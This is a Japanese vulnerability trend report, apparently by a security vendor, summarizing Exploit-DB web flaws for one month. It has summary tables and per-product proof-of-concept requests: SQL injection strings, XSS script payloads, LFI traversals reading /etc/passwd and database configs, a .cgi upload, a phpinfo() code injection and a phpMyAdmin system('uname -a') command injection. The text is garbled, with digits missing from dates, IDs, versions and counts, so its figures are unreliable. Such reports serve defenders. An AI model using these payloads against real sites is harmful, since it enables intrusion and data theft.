06.07
サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 7 月に公開された Exploit-DB の分析結果 クロスサイトスクリプティング (Cross Site Scripting) 攻撃に対する脆弱性の報告件数が最も多く 攻撃パターンも多様に発見されました 該当脆弱性は 一般的に発生するクロスサイトスクリプティング (Cross Site Scripting) 脆弱性ではなく 特定プログラム上でのみ発生する脆弱性がほとんどでした 主なソフトウェア別脆弱性発生の現況を見ると から最も多い脆弱性が発見されました (* で発見された脆弱性は 自体の問題ではなく 特定 Plug-in を使う際に発生し得る脆弱性がほとんどです ) 該当脆弱性は Parameter の Value に挿入される形式であり また特定な header を狙う脆弱性でした 脆弱性が発見されたプログラムや Plug-in を使用する管理者はアップデート事項の確認及び早急なアップデートが求められます. 脆弱性別件数脆弱性カテゴリ コマンドインジェクション (Command Injection) コード インジェクション (Code Injection) ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) 件数 SQL インジェクション 9 (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : 5 XSS) 合計 30 3 6 4 0 8 6 4 0 脆弱性別件数 3 9 5. 危険度別分類危険度 件数 割合 早急対応要 6.67% 高 8 93.33% 合計 30 00.00% 危険度別分類 8 早急対応要 高 3. 攻撃実行の難易度別件数難易度 件数 割合 難 6.67% 中 7 3.33% 易 70.00% 合計 30 00.00% 攻撃実行の難易度別件数 7 難 中 易 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 5 5 5 3 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script Streamo 合計 30 主なソフトウェア別脆弱性発生件数 5 5 5 3 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script
最新 Web 脆弱性トレンドレポート (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 06-07-04 40058 SQL Injection 易高 0.5 - index.php SQL Injection 脆弱性 /ecardmaxdemo/admin/index.php?step=admin_sho w_keyword&what=&row_number=0%0order% 0by%0--&search_year=06&page= 0.5 06-07-06 4006 SQL Injection 中高 Billing /admin/aomanage.php?search=&cat=status%0u System ().9.6 - NION%0select%0,,3,version%8%9,5,curre aomanage.php SQL Injection 脆 nt_user,7,8,9,0,,,3,4,5,6,7,8,9,0, 弱性 --&list=3&so=status' ().9. 06-07-04 4005 SQL Injection 難早急対応要 Photostore 4.7.5 - /photostore/gallery/objects/4/ page/ SQL Injection 脆弱性 POST / HTTP/. Chrome/6.0.9.75 Safari/535.7 postgalleryform=&gallerysortby=media_id&gallery SortType=asc,(SELECT 973 FROM(SELECT COUNT(*),CONCAT(0x776b6b7,(SELECT (ELT(973=973,))),0x778777,FLOOR(RAND (0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Photostore 4.7.5 06-07-04 40058 XSS 易高 0.5 - index.php XSS 脆弱性 /ecardmaxdemo/admin/index.php?step=admin_me mber_display&search_field=all&keyword=%3cscript %3Ealert()%3C%Fscript%3E&cmd_button=Sear ch+user 0.5 06-07-04 4005 XSS 易高 Photostore 4.7.5 - workbox.php XSS 脆弱性 /photostore/workbox.php?mode=addtolightbox& mediaid= ><script>alert(/xss/)</script> Photostore 4.7.5 06-07-04 4005 XSS 易高 Photostore 4.7.5 - mgr.login.php XSS 脆弱性 /photostore/manager/mgr.login.php?username=de mo&password='><script>alert("xss")</script><input type='hidden Photostore 4.7.5 06-07-06 4006 SQL Injection 中高 Billing System ().9.6 - hostingarchiveadmin.php SQL Injection 脆弱性 # /admin/hostingarchiveadmin.php?search=&cat=sta tus UNION select --&list=&so=status' ().9.
最新 Web 脆弱性トレンドレポート (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 06-07-06 40063 File Upload 易高 PaKnPost Pro.4 - select_.cgi File Upload 脆弱性 POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=------- --------------------7dd009908f PaKnPost PaKnPost Pro.4 -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi" Content-Type: application/octet-stream -----------------------------7dd009908f-- 06-07-06 4006 XSS 中高 Billing System ().9.6 - cmanage.php XSS 脆弱性 POST /admin/cmanage.php HTTP/. Chrome/6.0.9.75 Safari/535.7 ().9. reason=%%3e%3cscript%3ealert%8%9% 3C%Fscript%3E 06-07-06 4006 XSS 中高 Billing System ().9.6 - helpdesk.php XSS 脆弱性 POST /admin/helpdesk.php HTTP/. Chrome/6.0.9.75 Safari/535.7 ().9. hd_name="><script>alert()</script> 06-07-06 4006 XSS 中高 Billing System ().9.6 - omanage.php XSS 脆弱性 /omanage.php?search=%%3e%3cscript%3eal ert%83%9%3c/script%3e&cat=status%%3e %3Cscript%3Ealert%84%9%3C/script%3E&list =4%%3E%3Cscript%3Ealert%8%9%3C/scr ipt%3e&so=status%%3e%3cscript%3ealert% 8%9%3C/script%3E ().9. 06-07-06 40065 XSS 易高 3.0. - 4.0. - serverserver-settings.jsp XSS 脆弱性 POST /serverserver-settings.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. < 4.0. domain=%%f%3e%3cscript%3ealert%8% 7XSS%7%9%3C%Fscript%3E&remotePort=5 69&serverAllowed=Add+Server 06-07-06 40065 XSS 易高 /plugins/search/advance-usersearch.jsp?search=true&moreoptions=false&criteria 3.0. - 4.0. - advance-user-search.jsp XSS 脆 =admin%/%3e%3cscript%3ealert%8%7xss 弱性 %7%9%3C/script%3E&search=Search 3.0. < 4.0. 06-07-06 40065 XSS 易高 POST /muc-service-edit-form.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. - 4.0. - mucservice-edit-form.jsp XSS 脆弱性 3.0. < 4.0. save=true&mucname=test&mucdesc=test%%f %3E%3Cscript%3Ealert%8%7XSS- %7%9%3C%Fscript%3E
最新 Web 脆弱性トレンドレポート (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 06-07-06 40065 XSS 易高 POST /plugins/search/search-props-edit-form.jsp HTTP/. 3.0. - 4.0. - Chrome/6.0.9.75 Safari/535.7 search-props-edit-form.jsp XSS 脆弱性 3.0. < 4.0. searchenabled=true&searchname=%/%3e%3cs cript%3ealert('xss')%3c/script%3e&grouponly=fa lse 06-07-06 40065 XSS 易高 /groupsummary.jsp?search=test%+onmouseover%3dal 3.0. - 4.0. - group-summary.jsp XSS 脆弱性 ert%8%7xss%7%9+x%3d% 3.0. < 4.0. 06-07-04 40055 XSS 易高 POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/. Real3D FlipBook Chrome/6.0.9.75 Safari/535.7 Plugin - flipbooks.php XSS 脆弱 性 Real3D FlipBook Plugin action=delete&bookid=<script>alert(/makman/)</scr ipt> 06-07-08 40078 SQL Injection 難高 /programs.php?id=999999.9%7%0union%0all %0select%0concat%80x7e%C0x7%Cunhe Streamo Online Radio And TV x%8hex%8cast%8database%8%9%0as% Streaming CMS - programs.php 0char%9%9%9%C0x7%C0x7e%9%C SQL Injection 脆弱性 0x330335343830303536%0and%0%7x% 7%3D%7x Streamo Streamo Online Radio And TV Streaming CM 06-07-08 40076 LFI 易高 POST /admin/ajax_cms/get_template_content/ HTTP/. php Real Estate Script 3 - /admin/ajax_cms/get_template Chrome/6.0.9.75 Safari/535.7 _content/ LFI 脆弱性 php Real Estate Script php Real Estate Script 3 tpl=../../private/config/db.php GET / HTTP/. 06-07- 4008 XSS 易 高 All in One SEO Pack P User-Agent: Abonti </pre><script>alert();</script> All in One SEO Pack Plugin.3.6. 06-07- 40080 LFI 易高 Tiki Wiki CMS 5.0 - flv_stream.php LFI 脆弱性 /player/flv/flv_stream.php?file=../../../db/local.php& position=0 Tiki Wiki Tiki Wiki CMS 5.0 /index.php?app=core&module=system&controller= 06-07- 40084 Code Injection 易 高 IPS Community Suite 4...3 - incontent&do=find&content_class=cms\fields{}phpi nfo();/* IPS IPS Community Suite Community Suite 4...3
最新 Web 脆弱性トレンドレポート (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 06-07- 40083 XSS 易 高 POST /wp-login.php HTTP/. Chrome/6.0.9.75 Safari/535.7 Activity Log Plugin. X-Forwarded-For: <script>alert(document.cookie);</script> Activity Log Plugin.3. log=wordpress&pwd=sdsdssdsdsd&wpsubmit=log+in&redirect_to=http%3a%f%f9.6 8.8.35%Fwp-admin%F&testcookie= 06-07-4 40 SQL Injection 易高 Joomla Guru Pro (com_guru) Component - index.php SQL Injection 脆弱性 /index.php?option=com_guru&view=gurupcategs&l ayout=view&itemid=%0and%0=--&lang=en Joomla Joomla Guru Pro (com_guru) Component 06-07-0 4037 SQL Injection 中 高 POST /wp-admin/adminajax.php?action=spiderveideoplayerselectplaylist HTTP/. Chrome/6.0.9.75 Safari/535.7 Video Player Plugin Video Player Plugin.5. search_events_by_title=&page_number=0serch_or_n ot=&asc_or_desc=&order_by=(case WHEN (SELECT sleep(0)) = THEN id ELSE title END) ASC #&option=com_spider_video_player&task=select_pl aylist&boxchecked=0&filter_order_playlist=&filter_or der_dir_playlist= POST /index.php HTTP/. Content-Type: multipart/form-data; boundary=------- --------------------7dd009908f 06-07-0 409 XSS 易高 -----------------------------7dd009908f Content-Disposition: form-data; name="to_field" Django CMS 3.3.0 - /en/admin/djangocms_snippet/ id snippet// XSS 脆弱性 -----------------------------7dd009908f Content-Disposition: form-data; name="name" Django Django CMS 3.3.0 test <img src="x">%0%0>"<iframe src="a">%0<iframe> "><"<img src="x">%0%0>"<iframe src=a><script>alet();</script><iframe> -----------------------------7dd009908f-- 06-07-5 4050 SQL Injection 中高 CodoForum 3.. - index.php SQL Injection 脆弱性 /forum/index.php?u=/user/profile/%0and%0( SELECT%0*(IF((SELECT%0*%0FROM%0(SE LECT%0CONCAT((MID((IFNULL(CAST(CURRENT_U SER()%0AS%0CHAR),0x0)),,45))))s),%084 467440737095560,%08446744073709556 0))) CodoForum CodoForum 3.. 06-07-6 4063 LFI 易高 PHP File Vault 0.9 - /htdocs/fileinfo.php LFI 脆弱性 /htdocs/fileinfo.php?sha=..%f..%f..%f..%f..%f..%fetc%fpasswd PHP File Vault PHP File Vault 0.9
最新 Web 脆弱性トレンドレポート (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 06-07-9 4074 SQL Injection 易高 Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/. Chrome/6.0.9.75 Safari/535.7 Ultimate Product Catalog 3.9.8 id=+or+sleep(0)+--+ 06-07-9 4085 Command Injection 易 早急対応要 POST /tbl_find_replace.php HTTP/. Chrome/6.0.9.75 Safari/535.7 PhpMyAdmin 4.6. - tbl_find_rep PhpMyAdmin PhpMyAdmin 4.6. replacewith=system('uname -a');